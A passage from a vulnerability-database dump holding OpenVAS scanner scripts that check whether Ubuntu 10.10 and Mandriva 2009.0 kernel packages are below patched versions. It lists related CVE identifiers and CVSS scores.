isdpkgvuln(pkg:\"fs-core-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-secondary-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-secondary-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-secondary-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"input-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"input-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"irda-modules-2.6.35-23-generic-di\", 
ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"irda-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"irda-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kernel-image-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kernel-image-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kernel-image-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"md-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"md-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"md-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"message-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"message-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"message-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n 
}\n\n if ((res = isdpkgvuln(pkg:\"mouse-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mouse-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mouse-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nfs-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nfs-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-pcmcia-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-pcmcia-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-shared-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-shared-modules-2.6.35-23-generic-pae-di\", 
ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-shared-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-usb-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-usb-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"parport-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"parport-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"parport-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pata-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pata-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-storage-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-storage-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"plip-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"plip-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ppp-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ppp-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ppp-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sata-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sata-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sata-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"scsi-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"scsi-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isdpkgvuln(pkg:\"scsi-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"serial-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"serial-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"squashfs-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"squashfs-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"squashfs-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"storage-core-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"storage-core-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"storage-core-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"usb-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"usb-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"virtio-modules-2.6.35-23-generic-di\", 
ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"virtio-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"virtio-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"vlan-modules-2.6.35-23-generic-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"vlan-modules-2.6.35-23-generic-pae-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"vlan-modules-2.6.35-23-virtual-di\", ver:\"2.6.35-23.41\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-03-14T19:04:41", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2011-01-04T00:00:00", "type": "openvas", "title": "Mandriva Update for kernel MDVSA-2010:257 (kernel)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2963", "CVE-2010-3850", "CVE-2010-3442", "CVE-2010-3848", "CVE-2010-2240", "CVE-2010-3858", "CVE-2010-3067", "CVE-2010-3849"], "modified": "2020-03-13T00:00:00", "id": "OPENVAS:1361412562310831290", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310831290", "sourceData": "# Copyright (C) 2011 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it 
isrpmvuln(pkg:\"nvidia96xx-kernel-desktop-latest\", rpm:\"nvidia96xx-kernel-desktop-latest~96.43.07~1.20101216.5mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"nvidia96xx-kernel-server-latest\", rpm:\"nvidia96xx-kernel-server-latest~96.43.07~1.20101216.5mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"nvidia-current-kernel\", rpm:\"nvidia-current-kernel~2.6.27.56~desktop~1mnb~177.70~2.3mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"nvidia-current-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"nvidia-current-kernel-2.6.27.56-desktop586-1mnb~177.70~2.3mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"nvidia-current-kernel-2.6.27.56-server\", rpm:\"nvidia-current-kernel-2.6.27.56-server~1mnb~177.70~2.3mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"nvidia-current-kernel-desktop586-latest\", rpm:\"nvidia-current-kernel-desktop586-latest~177.70~1.20101216.2.3mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"nvidia-current-kernel-desktop-latest\", rpm:\"nvidia-current-kernel-desktop-latest~177.70~1.20101216.2.3mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"nvidia-current-kernel-server-latest\", rpm:\"nvidia-current-kernel-server-latest~177.70~1.20101216.2.3mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"omfs-kernel\", rpm:\"omfs-kernel~2.6.27.56~desktop~1mnb~0.8.0~1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"omfs-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"omfs-kernel-2.6.27.56-desktop586-1mnb~0.8.0~1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"omfs-kernel-2.6.27.56-server-1mnb\", 
rpm:\"omfs-kernel-2.6.27.56-server-1mnb~0.8.0~1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"omfs-kernel-desktop586-latest\", rpm:\"omfs-kernel-desktop586-latest~0.8.0~1.20101216.1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"omfs-kernel-desktop-latest\", rpm:\"omfs-kernel-desktop-latest~0.8.0~1.20101216.1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"omfs-kernel-server-latest\", rpm:\"omfs-kernel-server-latest~0.8.0~1.20101216.1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"omnibook-kernel\", rpm:\"omnibook-kernel~2.6.27.56~desktop~1mnb~20080513~0.274.1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"omnibook-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"omnibook-kernel-2.6.27.56-desktop586-1mnb~20080513~0.274.1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"omnibook-kernel-2.6.27.56-server-1mnb\", rpm:\"omnibook-kernel-2.6.27.56-server-1mnb~20080513~0.274.1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"omnibook-kernel-desktop586-latest\", rpm:\"omnibook-kernel-desktop586~latest-20080513~1.20101216.0.274.1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"omnibook-kernel-desktop-latest\", rpm:\"omnibook-kernel-desktop~latest-20080513~1.20101216.0.274.1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"omnibook-kernel-server-latest\", rpm:\"omnibook-kernel-server~latest-20080513~1.20101216.0.274.1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"opencbm-kernel\", rpm:\"opencbm-kernel~2.6.27.56~desktop~1mnb~0.4.2a~1mdv2008.1\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = 
isrpmvuln(pkg:\"opencbm-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"opencbm-kernel-2.6.27.56-desktop586-1mnb~0.4.2a~1mdv2008.1\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"opencbm-kernel-2.6.27.56-server-1mnb\", rpm:\"opencbm-kernel-2.6.27.56-server-1mnb~0.4.2a~1mdv2008.1\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"opencbm-kernel-desktop586-latest\", rpm:\"opencbm-kernel-desktop586-latest~0.4.2a~1.20101216.1mdv2008.1\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"opencbm-kernel-desktop-latest\", rpm:\"opencbm-kernel-desktop-latest~0.4.2a~1.20101216.1mdv2008.1\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"opencbm-kernel-server-latest\", rpm:\"opencbm-kernel-server-latest~0.4.2a~1.20101216.1mdv2008.1\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ov51x-jpeg-kernel\", rpm:\"ov51x-jpeg-kernel~2.6.27.56~desktop~1mnb~1.5.9~2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ov51x-jpeg-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"ov51x-jpeg-kernel-2.6.27.56-desktop586-1mnb~1.5.9~2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ov51x-jpeg-kernel-2.6.27.56-server-1mnb\", rpm:\"ov51x-jpeg-kernel-2.6.27.56-server-1mnb~1.5.9~2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ov51x-jpeg-kernel-desktop586-latest\", rpm:\"ov51x-jpeg-kernel-desktop586-latest~1.5.9~1.20101216.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ov51x-jpeg-kernel-desktop-latest\", rpm:\"ov51x-jpeg-kernel-desktop-latest~1.5.9~1.20101216.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ov51x-jpeg-kernel-server-latest\", 
rpm:\"ov51x-jpeg-kernel-server-latest~1.5.9~1.20101216.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"qc-usb-kernel\", rpm:\"qc-usb-kernel~2.6.27.56~desktop~1mnb~0.6.6~6mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"qc-usb-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"qc-usb-kernel-2.6.27.56-desktop586-1mnb~0.6.6~6mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"qc-usb-kernel-2.6.27.56-server-1mnb\", rpm:\"qc-usb-kernel-2.6.27.56-server-1mnb~0.6.6~6mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"qc-usb-kernel-desktop586-latest\", rpm:\"qc-usb-kernel-desktop586-latest~0.6.6~1.20101216.6mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"qc-usb-kernel-desktop-latest\", rpm:\"qc-usb-kernel-desktop-latest~0.6.6~1.20101216.6mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"qc-usb-kernel-server-latest\", rpm:\"qc-usb-kernel-server-latest~0.6.6~1.20101216.6mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rt2860-kernel\", rpm:\"rt2860-kernel~2.6.27.56~desktop~1mnb~1.7.0.0~2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rt2860-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"rt2860-kernel-2.6.27.56-desktop586-1mnb~1.7.0.0~2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rt2860-kernel-2.6.27.56-server-1mnb\", rpm:\"rt2860-kernel-2.6.27.56-server-1mnb~1.7.0.0~2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rt2860-kernel-desktop586-latest\", rpm:\"rt2860-kernel-desktop586-latest~1.7.0.0~1.20101216.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = 
isrpmvuln(pkg:\"rt2860-kernel-desktop-latest\", rpm:\"rt2860-kernel-desktop-latest~1.7.0.0~1.20101216.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rt2860-kernel-server-latest\", rpm:\"rt2860-kernel-server-latest~1.7.0.0~1.20101216.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rt2870-kernel\", rpm:\"rt2870-kernel~2.6.27.56~desktop~1mnb~1.3.1.0~2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rt2870-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"rt2870-kernel-2.6.27.56-desktop586-1mnb~1.3.1.0~2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rt2870-kernel-2.6.27.56-server-1mnb\", rpm:\"rt2870-kernel-2.6.27.56-server-1mnb~1.3.1.0~2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rt2870-kernel-desktop586-latest\", rpm:\"rt2870-kernel-desktop586-latest~1.3.1.0~1.20101216.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rt2870-kernel-desktop-latest\", rpm:\"rt2870-kernel-desktop-latest~1.3.1.0~1.20101216.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rt2870-kernel-server-latest\", rpm:\"rt2870-kernel-server-latest~1.3.1.0~1.20101216.2mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rtl8187se-kernel\", rpm:\"rtl8187se-kernel~2.6.27.56~desktop~1mnb~1016.20080716~1.1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rtl8187se-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"rtl8187se-kernel-2.6.27.56-desktop586-1mnb~1016.20080716~1.1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rtl8187se-kernel-2.6.27.56-server-1mnb\", rpm:\"rtl8187se-kernel-2.6.27.56-server-1mnb~1016.20080716~1.1mdv2009.0\", 
rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rtl8187se-kernel-desktop586-latest\", rpm:\"rtl8187se-kernel-desktop586-latest~1016.20080716~1.20101216.1.1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rtl8187se-kernel-desktop-latest\", rpm:\"rtl8187se-kernel-desktop-latest~1016.20080716~1.20101216.1.1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rtl8187se-kernel-server-latest\", rpm:\"rtl8187se-kernel-server-latest~1016.20080716~1.20101216.1.1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"slmodem-kernel\", rpm:\"slmodem-kernel~2.6.27.56~desktop~1mnb~2.9.11~0.20080817.1mdv2009.0\", rls:\"MNDK_2009.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"slmodem-kernel-2.6.27.56-desktop586-1mnb\", 